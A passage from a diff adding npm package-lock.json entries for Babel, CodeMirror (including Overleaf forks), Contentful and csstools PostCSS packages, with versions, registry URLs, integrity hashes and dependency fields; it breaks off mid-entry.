"node_modules/@babel/types": { + "version": "7.26.9", + "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.26.9.tgz", + "integrity": "sha512-Y3IR1cRnOxOCDvMmNiym7XpXQ93iGDDPHx+Zj+NM+rg0fBaShfQLkg+hKPaZCEvg5N/LeCo4+Rj/i3FuJsIQaw==", + "license": "MIT", + "dependencies": { + "@babel/helper-string-parser": "^7.25.9", + "@babel/helper-validator-identifier": "^7.25.9" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@balena/dockerignore": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@balena/dockerignore/-/dockerignore-1.0.2.tgz", + "integrity": "sha512-wMue2Sy4GAVTk6Ic4tJVcnfdau+gx2EnG7S+uAEe+TWJFqE4YoWN4/H8MSLj4eYJKxGg26lZwboEniNiNwZQ6Q==", + "license": "Apache-2.0" + }, + "node_modules/@bcoe/v8-coverage": { + "version": "0.2.3", + "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", + "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", + "dev": true + }, + "node_modules/@codemirror/autocomplete": { + "version": "6.18.4", + "resolved": "git+ssh://git@github.com/overleaf/codemirror-autocomplete.git#6445cd056671c98d12d1c597ba705e11327ec4c5", + "integrity": "sha512-NOpHncgkcZ2w92bO+H6mIzcSToAKt1fWQRImKnDsNbYvp4X/638d6SOuEoE7pSZ7tryJbqKDrE3Zs6nVIXACUA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@codemirror/language": "^6.0.0", + "@codemirror/state": "^6.0.0", + "@codemirror/view": "^6.17.0", + "@lezer/common": "^1.0.0" + } + }, + "node_modules/@codemirror/commands": { + "version": "6.8.0", + "resolved": "https://registry.npmjs.org/@codemirror/commands/-/commands-6.8.0.tgz", + "integrity": "sha512-q8VPEFaEP4ikSlt6ZxjB3zW72+7osfAYW9i8Zu943uqbKuz6utc1+F170hyLUCUltXORjQXRyYQNfkckzA/bPQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@codemirror/language": "^6.0.0", + "@codemirror/state": "^6.4.0", + "@codemirror/view": "^6.27.0", + "@lezer/common": "^1.1.0" + } + }, + "node_modules/@codemirror/lang-css": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/@codemirror/lang-css/-/lang-css-6.0.0.tgz", + "integrity": "sha512-jBqc+BTuwhNOTlrimFghLlSrN6iFuE44HULKWoR4qKYObhOIl9Lci1iYj6zMIte1XTQmZguNvjXMyr43LUKwSw==", + "dev": true, + "dependencies": { + "@codemirror/autocomplete": "^6.0.0", + "@codemirror/language": "^6.0.0", + "@codemirror/state": "^6.0.0", + "@lezer/css": "^1.0.0" + } + }, + "node_modules/@codemirror/lang-html": { + "version": "6.1.0", + "resolved": "https://registry.npmjs.org/@codemirror/lang-html/-/lang-html-6.1.0.tgz", + "integrity": "sha512-gA7NmJxqvnhwza05CvR7W/39Ap9r/4Vs9uiC0IeFYo1hSlJzc/8N6Evviz6vTW1x8SpHcRYyqKOf6rpl6LfWtg==", + "dev": true, + "dependencies": { + "@codemirror/autocomplete": "^6.0.0", + "@codemirror/lang-css": "^6.0.0", + "@codemirror/lang-javascript": "^6.0.0", + "@codemirror/language": "^6.0.0", + "@codemirror/state": "^6.0.0", + "@lezer/common": "^1.0.0", + "@lezer/html": "^1.0.0" + } + }, + "node_modules/@codemirror/lang-javascript": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/@codemirror/lang-javascript/-/lang-javascript-6.0.1.tgz", + "integrity": "sha512-kjGbBEosl+ozDU5ruDV48w4v3H6KECTFiDjqMLT0KhVwESPfv3wOvnDrTT0uaMOg3YRGnBWsyiIoKHl/tNWWDg==", + "dev": true, + "dependencies": { + "@codemirror/autocomplete": "^6.0.0", + "@codemirror/language": "^6.0.0", + "@codemirror/lint": "^6.0.0", + "@codemirror/state": "^6.0.0", + "@codemirror/view": "^6.0.0", + "@lezer/common": "^1.0.0", + "@lezer/javascript": "^1.0.0" + } + }, + 
"node_modules/@codemirror/lang-markdown": { + "version": "6.3.2", + "resolved": "https://registry.npmjs.org/@codemirror/lang-markdown/-/lang-markdown-6.3.2.tgz", + "integrity": "sha512-c/5MYinGbFxYl4itE9q/rgN/sMTjOr8XL5OWnC+EaRMLfCbVUmmubTJfdgpfcSS2SCaT7b+Q+xi3l6CgoE+BsA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@codemirror/autocomplete": "^6.7.1", + "@codemirror/lang-html": "^6.0.0", + "@codemirror/language": "^6.3.0", + "@codemirror/state": "^6.0.0", + "@codemirror/view": "^6.0.0", + "@lezer/common": "^1.2.1", + "@lezer/markdown": "^1.0.0" + } + }, + "node_modules/@codemirror/language": { + "version": "6.10.8", + "resolved": "https://registry.npmjs.org/@codemirror/language/-/language-6.10.8.tgz", + "integrity": "sha512-wcP8XPPhDH2vTqf181U8MbZnW+tDyPYy0UzVOa+oHORjyT+mhhom9vBd7dApJwoDz9Nb/a8kHjJIsuA/t8vNFw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@codemirror/state": "^6.0.0", + "@codemirror/view": "^6.23.0", + "@lezer/common": "^1.1.0", + "@lezer/highlight": "^1.0.0", + "@lezer/lr": "^1.0.0", + "style-mod": "^4.0.0" + } + }, + "node_modules/@codemirror/lint": { + "version": "6.8.4", + "resolved": "https://registry.npmjs.org/@codemirror/lint/-/lint-6.8.4.tgz", + "integrity": "sha512-u4q7PnZlJUojeRe8FJa/njJcMctISGgPQ4PnWsd9268R4ZTtU+tfFYmwkBvgcrK2+QQ8tYFVALVb5fVJykKc5A==", + "dev": true, + "license": "MIT", + "dependencies": { + "@codemirror/state": "^6.0.0", + "@codemirror/view": "^6.35.0", + "crelt": "^1.0.5" + } + }, + "node_modules/@codemirror/search": { + "version": "6.5.8", + "resolved": "git+ssh://git@github.com/overleaf/codemirror-search.git#04380a528c339cd4b78fb10b3ef017f657ec17bd", + "integrity": "sha512-G2sM4Rfnbb8S59HPgLXa2NWS4a9TDf+3cKos/58JPtDQtbBCcHz1c8Oy3x5PhQ+vJS+Mr282WLG8PE/MbhE0eg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@codemirror/state": "^6.0.0", + "@codemirror/view": "^6.0.0", + "crelt": "^1.0.5" + } + }, + "node_modules/@codemirror/state": { + "version": "6.5.2", + "resolved": "https://registry.npmjs.org/@codemirror/state/-/state-6.5.2.tgz", + "integrity": "sha512-FVqsPqtPWKVVL3dPSxy8wEF/ymIEuVzF1PK3VbUgrxXpJUSHQWWZz4JMToquRxnkw+36LTamCZG2iua2Ptq0fA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@marijn/find-cluster-break": "^1.0.0" + } + }, + "node_modules/@codemirror/view": { + "version": "6.36.3", + "resolved": "https://registry.npmjs.org/@codemirror/view/-/view-6.36.3.tgz", + "integrity": "sha512-N2bilM47QWC8Hnx0rMdDxO2x2ImJ1FvZWXubwKgjeoOrWwEiFrtpA7SFHcuZ+o2Ze2VzbkgbzWVj4+V18LVkeg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@codemirror/state": "^6.5.0", + "style-mod": "^4.1.0", + "w3c-keyname": "^2.2.4" + } + }, + "node_modules/@contentful/rich-text-html-renderer": { + "version": "16.0.2", + "resolved": "https://registry.npmjs.org/@contentful/rich-text-html-renderer/-/rich-text-html-renderer-16.0.2.tgz", + "integrity": "sha512-0flmxVixlNk5PMiHXAlABUJ2uURsWxOjbC6ZHhqpEVHU03kHMoIKfDdo6CRZc0S0rMWMO3c14Ei91E97T06T8w==", + "dependencies": { + "@contentful/rich-text-types": "^16.0.2", + "escape-html": "^1.0.3" + }, + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/@contentful/rich-text-types": { + "version": "16.0.2", + "resolved": "https://registry.npmjs.org/@contentful/rich-text-types/-/rich-text-types-16.0.2.tgz", + "integrity": "sha512-ovbmCKQjlyGek4NuABoqDesC3FBV3e5jPMMdtT2mpOy9ia31MKO0NSFMRGZu7Q+veZzmDMja8S1i/XeFCUT9Pw==", + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/@csstools/cascade-layer-name-parser": { + "version": "1.0.5", + "resolved": 
"https://registry.npmjs.org/@csstools/cascade-layer-name-parser/-/cascade-layer-name-parser-1.0.5.tgz", + "integrity": "sha512-v/5ODKNBMfBl0us/WQjlfsvSlYxfZLhNMVIsuCPib2ulTwGKYbKJbwqw671+qH9Y4wvWVnu7LBChvml/wBKjFg==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "@csstools/css-parser-algorithms": "^2.3.2", + "@csstools/css-tokenizer": "^2.2.1" + } + }, + "node_modules/@csstools/color-helpers": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/@csstools/color-helpers/-/color-helpers-3.0.2.tgz", + "integrity": "sha512-NMVs/l7Y9eIKL5XjbCHEgGcG8LOUT2qVcRjX6EzkCdlvftHVKr2tHIPzHavfrULRZ5Q2gxrJ9f44dAlj6fX97Q==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "engines": { + "node": "^14 || ^16 || >=18" + } + }, + "node_modules/@csstools/css-calc": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/@csstools/css-calc/-/css-calc-1.1.4.tgz", + "integrity": "sha512-ZV1TSmToiNcQL1P3hfzlzZzA02mmVkVmXGaUDUqpYUG84PmLhVSZpKX+KfxAuOcK7de04UXSQPBrAvaya6iiGg==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "@csstools/css-parser-algorithms": "^2.3.2", + "@csstools/css-tokenizer": "^2.2.1" + } + }, + "node_modules/@csstools/css-color-parser": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/@csstools/css-color-parser/-/css-color-parser-1.4.0.tgz", + "integrity": "sha512-SlGd8E6ron24JYQPQAIzu5tvmWi1H4sDKTdA7UDnwF45oJv7AVESbOlOO1YjfBhrQFuvLWUgKiOY9DwGoAxwTA==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "dependencies": { + "@csstools/color-helpers": "^3.0.2", + "@csstools/css-calc": "^1.1.4" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "@csstools/css-parser-algorithms": "^2.3.2", + "@csstools/css-tokenizer": "^2.2.1" + } + }, + "node_modules/@csstools/css-parser-algorithms": { + "version": "2.6.1", + "resolved": "https://registry.npmjs.org/@csstools/css-parser-algorithms/-/css-parser-algorithms-2.6.1.tgz", + "integrity": "sha512-ubEkAaTfVZa+WwGhs5jbo5Xfqpeaybr/RvWzvFxRs4jfq16wH8l8Ty/QEEpINxll4xhuGfdMbipRyz5QZh9+FA==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "@csstools/css-tokenizer": "^2.2.4" + } + }, + "node_modules/@csstools/css-tokenizer": { + "version": "2.2.4", + "resolved": "https://registry.npmjs.org/@csstools/css-tokenizer/-/css-tokenizer-2.2.4.tgz", + "integrity": "sha512-PuWRAewQLbDhGeTvFuq2oClaSCKPIBmHyIobCV39JHRYN0byDcUWJl5baPeNUcqrjtdMNqFooE0FGl31I3JOqw==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + 
], + "engines": { + "node": "^14 || ^16 || >=18" + } + }, + "node_modules/@csstools/media-query-list-parser": { + "version": "2.1.9", + "resolved": "https://registry.npmjs.org/@csstools/media-query-list-parser/-/media-query-list-parser-2.1.9.tgz", + "integrity": "sha512-qqGuFfbn4rUmyOB0u8CVISIp5FfJ5GAR3mBrZ9/TKndHakdnm6pY0L/fbLcpPnrzwCyyTEZl1nUcXAYHEWneTA==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "@csstools/css-parser-algorithms": "^2.6.1", + "@csstools/css-tokenizer": "^2.2.4" + } + }, + "node_modules/@csstools/postcss-cascade-layers": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/@csstools/postcss-cascade-layers/-/postcss-cascade-layers-3.0.1.tgz", + "integrity": "sha512-dD8W98dOYNOH/yX4V4HXOhfCOnvVAg8TtsL+qCGNoKXuq5z2C/d026wGWgySgC8cajXXo/wNezS31Glj5GcqrA==", + "dev": true, + "dependencies": { + "@csstools/selector-specificity": "^2.0.2", + "postcss-selector-parser": "^6.0.10" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/postcss-color-function": { + "version": "2.2.3", + "resolved": "https://registry.npmjs.org/@csstools/postcss-color-function/-/postcss-color-function-2.2.3.tgz", + "integrity": "sha512-b1ptNkr1UWP96EEHqKBWWaV5m/0hgYGctgA/RVZhONeP1L3T/8hwoqDm9bB23yVCfOgE9U93KI9j06+pEkJTvw==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "dependencies": { + "@csstools/css-color-parser": "^1.2.0", + "@csstools/css-parser-algorithms": "^2.1.1", + "@csstools/css-tokenizer": "^2.1.1", + "@csstools/postcss-progressive-custom-properties": "^2.3.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/postcss-color-mix-function": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/@csstools/postcss-color-mix-function/-/postcss-color-mix-function-1.0.3.tgz", + "integrity": "sha512-QGXjGugTluqFZWzVf+S3wCiRiI0ukXlYqCi7OnpDotP/zaVTyl/aqZujLFzTOXy24BoWnu89frGMc79ohY5eog==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "dependencies": { + "@csstools/css-color-parser": "^1.2.0", + "@csstools/css-parser-algorithms": "^2.1.1", + "@csstools/css-tokenizer": "^2.1.1", + "@csstools/postcss-progressive-custom-properties": "^2.3.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/postcss-font-format-keywords": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/@csstools/postcss-font-format-keywords/-/postcss-font-format-keywords-2.0.2.tgz", + "integrity": "sha512-iKYZlIs6JsNT7NKyRjyIyezTCHLh4L4BBB3F5Nx7Dc4Z/QmBgX+YJFuUSar8IM6KclGiAUFGomXFdYxAwJydlA==", + "dev": true, + "dependencies": { + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": 
{ + "postcss": "^8.4" + } + }, + "node_modules/@csstools/postcss-gradients-interpolation-method": { + "version": "3.0.6", + "resolved": "https://registry.npmjs.org/@csstools/postcss-gradients-interpolation-method/-/postcss-gradients-interpolation-method-3.0.6.tgz", + "integrity": "sha512-rBOBTat/YMmB0G8VHwKqDEx+RZ4KCU9j42K8LwS0IpZnyThalZZF7BCSsZ6TFlZhcRZKlZy3LLFI2pLqjNVGGA==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "dependencies": { + "@csstools/css-color-parser": "^1.2.0", + "@csstools/css-parser-algorithms": "^2.1.1", + "@csstools/css-tokenizer": "^2.1.1", + "@csstools/postcss-progressive-custom-properties": "^2.3.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/postcss-hwb-function": { + "version": "2.2.2", + "resolved": "https://registry.npmjs.org/@csstools/postcss-hwb-function/-/postcss-hwb-function-2.2.2.tgz", + "integrity": "sha512-W5Y5oaJ382HSlbdGfPf60d7dAK6Hqf10+Be1yZbd/TNNrQ/3dDdV1c07YwOXPQ3PZ6dvFMhxbIbn8EC3ki3nEg==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "dependencies": { + "@csstools/css-color-parser": "^1.2.0", + "@csstools/css-parser-algorithms": "^2.1.1", + "@csstools/css-tokenizer": "^2.1.1" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/postcss-ic-unit": { + "version": "2.0.4", + "resolved": "https://registry.npmjs.org/@csstools/postcss-ic-unit/-/postcss-ic-unit-2.0.4.tgz", + "integrity": "sha512-9W2ZbV7whWnr1Gt4qYgxMWzbevZMOvclUczT5vk4yR6vS53W/njiiUhtm/jh/BKYwQ1W3PECZjgAd2dH4ebJig==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "dependencies": { + "@csstools/postcss-progressive-custom-properties": "^2.3.0", + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/postcss-is-pseudo-class": { + "version": "3.2.1", + "resolved": "https://registry.npmjs.org/@csstools/postcss-is-pseudo-class/-/postcss-is-pseudo-class-3.2.1.tgz", + "integrity": "sha512-AtANdV34kJl04Al62is3eQRk/BfOfyAvEmRJvbt+nx5REqImLC+2XhuE6skgkcPli1l8ONS67wS+l1sBzySc3Q==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "dependencies": { + "@csstools/selector-specificity": "^2.0.0", + "postcss-selector-parser": "^6.0.10" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/postcss-logical-float-and-clear": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/@csstools/postcss-logical-float-and-clear/-/postcss-logical-float-and-clear-1.0.1.tgz", + "integrity": "sha512-eO9z2sMLddvlfFEW5Fxbjyd03zaO7cJafDurK4rCqyRt9P7aaWwha0LcSzoROlcZrw1NBV2JAp2vMKfPMQO1xw==", + "dev": true, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + 
"peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/postcss-logical-resize": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/@csstools/postcss-logical-resize/-/postcss-logical-resize-1.0.1.tgz", + "integrity": "sha512-x1ge74eCSvpBkDDWppl+7FuD2dL68WP+wwP2qvdUcKY17vJksz+XoE1ZRV38uJgS6FNUwC0AxrPW5gy3MxsDHQ==", + "dev": true, + "dependencies": { + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/postcss-logical-viewport-units": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/@csstools/postcss-logical-viewport-units/-/postcss-logical-viewport-units-1.0.3.tgz", + "integrity": "sha512-6zqcyRg9HSqIHIPMYdt6THWhRmE5/tyHKJQLysn2TeDf/ftq7Em9qwMTx98t2C/7UxIsYS8lOiHHxAVjWn2WUg==", + "dev": true, + "dependencies": { + "@csstools/css-tokenizer": "^2.1.1" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/postcss-media-minmax": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/@csstools/postcss-media-minmax/-/postcss-media-minmax-1.1.0.tgz", + "integrity": "sha512-t5Li/DPC5QmW/6VFLfUvsw/4dNYYseWR0tOXDeJg/9EKUodBgNawz5tuk5vYKtNvoj+Q08odMuXcpS5YJj0AFA==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "dependencies": { + "@csstools/css-calc": "^1.1.4", + "@csstools/css-parser-algorithms": "^2.3.2", + "@csstools/css-tokenizer": "^2.2.1", + "@csstools/media-query-list-parser": "^2.1.5" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/postcss-media-queries-aspect-ratio-number-values": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/@csstools/postcss-media-queries-aspect-ratio-number-values/-/postcss-media-queries-aspect-ratio-number-values-1.0.4.tgz", + "integrity": "sha512-IwyTbyR8E2y3kh6Fhrs251KjKBJeUPV5GlnUKnpU70PRFEN2DolWbf2V4+o/B9+Oj77P/DullLTulWEQ8uFtAA==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "dependencies": { + "@csstools/css-parser-algorithms": "^2.2.0", + "@csstools/css-tokenizer": "^2.1.1", + "@csstools/media-query-list-parser": "^2.1.1" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/postcss-nested-calc": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/@csstools/postcss-nested-calc/-/postcss-nested-calc-2.0.2.tgz", + "integrity": "sha512-jbwrP8rN4e7LNaRcpx3xpMUjhtt34I9OV+zgbcsYAAk6k1+3kODXJBf95/JMYWhu9g1oif7r06QVUgfWsKxCFw==", + "dev": true, + "dependencies": { + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/postcss-normalize-display-values": { + "version": "2.0.1", + "resolved": 
"https://registry.npmjs.org/@csstools/postcss-normalize-display-values/-/postcss-normalize-display-values-2.0.1.tgz", + "integrity": "sha512-TQT5g3JQ5gPXC239YuRK8jFceXF9d25ZvBkyjzBGGoW5st5sPXFVQS8OjYb9IJ/K3CdfK4528y483cgS2DJR/w==", + "dev": true, + "dependencies": { + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/postcss-oklab-function": { + "version": "2.2.3", + "resolved": "https://registry.npmjs.org/@csstools/postcss-oklab-function/-/postcss-oklab-function-2.2.3.tgz", + "integrity": "sha512-AgJ2rWMnLCDcbSMTHSqBYn66DNLBym6JpBpCaqmwZ9huGdljjDRuH3DzOYzkgQ7Pm2K92IYIq54IvFHloUOdvA==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "dependencies": { + "@csstools/css-color-parser": "^1.2.0", + "@csstools/css-parser-algorithms": "^2.1.1", + "@csstools/css-tokenizer": "^2.1.1", + "@csstools/postcss-progressive-custom-properties": "^2.3.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/postcss-progressive-custom-properties": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/@csstools/postcss-progressive-custom-properties/-/postcss-progressive-custom-properties-2.3.0.tgz", + "integrity": "sha512-Zd8ojyMlsL919TBExQ1I0CTpBDdyCpH/yOdqatZpuC3sd22K4SwC7+Yez3Q/vmXMWSAl+shjNeFZ7JMyxMjK+Q==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "dependencies": { + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/postcss-relative-color-syntax": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@csstools/postcss-relative-color-syntax/-/postcss-relative-color-syntax-1.0.2.tgz", + "integrity": "sha512-juCoVInkgH2TZPfOhyx6tIal7jW37L/0Tt+Vcl1LoxqQA9sxcg3JWYZ98pl1BonDnki6s/M7nXzFQHWsWMeHgw==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "dependencies": { + "@csstools/css-color-parser": "^1.2.0", + "@csstools/css-parser-algorithms": "^2.1.1", + "@csstools/css-tokenizer": "^2.1.1", + "@csstools/postcss-progressive-custom-properties": "^2.3.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/postcss-scope-pseudo-class": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/@csstools/postcss-scope-pseudo-class/-/postcss-scope-pseudo-class-2.0.2.tgz", + "integrity": "sha512-6Pvo4uexUCXt+Hz5iUtemQAcIuCYnL+ePs1khFR6/xPgC92aQLJ0zGHonWoewiBE+I++4gXK3pr+R1rlOFHe5w==", + "dev": true, + "dependencies": { + "postcss-selector-parser": "^6.0.10" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/postcss-stepped-value-functions": { + "version": "2.1.1", + "resolved": 
"https://registry.npmjs.org/@csstools/postcss-stepped-value-functions/-/postcss-stepped-value-functions-2.1.1.tgz", + "integrity": "sha512-YCvdF0GCZK35nhLgs7ippcxDlRVe5QsSht3+EghqTjnYnyl3BbWIN6fYQ1dKWYTJ+7Bgi41TgqQFfJDcp9Xy/w==", + "dev": true, + "dependencies": { + "@csstools/css-calc": "^1.1.1", + "@csstools/css-parser-algorithms": "^2.1.1", + "@csstools/css-tokenizer": "^2.1.1" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/postcss-text-decoration-shorthand": { + "version": "2.2.4", + "resolved": "https://registry.npmjs.org/@csstools/postcss-text-decoration-shorthand/-/postcss-text-decoration-shorthand-2.2.4.tgz", + "integrity": "sha512-zPN56sQkS/7YTCVZhOBVCWf7AiNge8fXDl7JVaHLz2RyT4pnyK2gFjckWRLpO0A2xkm1lCgZ0bepYZTwAVd/5A==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "dependencies": { + "@csstools/color-helpers": "^2.1.0", + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/postcss-text-decoration-shorthand/node_modules/@csstools/color-helpers": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/@csstools/color-helpers/-/color-helpers-2.1.0.tgz", + "integrity": "sha512-OWkqBa7PDzZuJ3Ha7T5bxdSVfSCfTq6K1mbAhbO1MD+GSULGjrp45i5RudyJOedstSarN/3mdwu9upJE7gDXfw==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "engines": { + "node": "^14 || ^16 || >=18" + } + }, + "node_modules/@csstools/postcss-trigonometric-functions": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/@csstools/postcss-trigonometric-functions/-/postcss-trigonometric-functions-2.1.1.tgz", + "integrity": "sha512-XcXmHEFfHXhvYz40FtDlA4Fp4NQln2bWTsCwthd2c+MCnYArUYU3YaMqzR5CrKP3pMoGYTBnp5fMqf1HxItNyw==", + "dev": true, + "dependencies": { + "@csstools/css-calc": "^1.1.1", + "@csstools/css-parser-algorithms": "^2.1.1", + "@csstools/css-tokenizer": "^2.1.1" + }, + "engines": { + "node": "^14 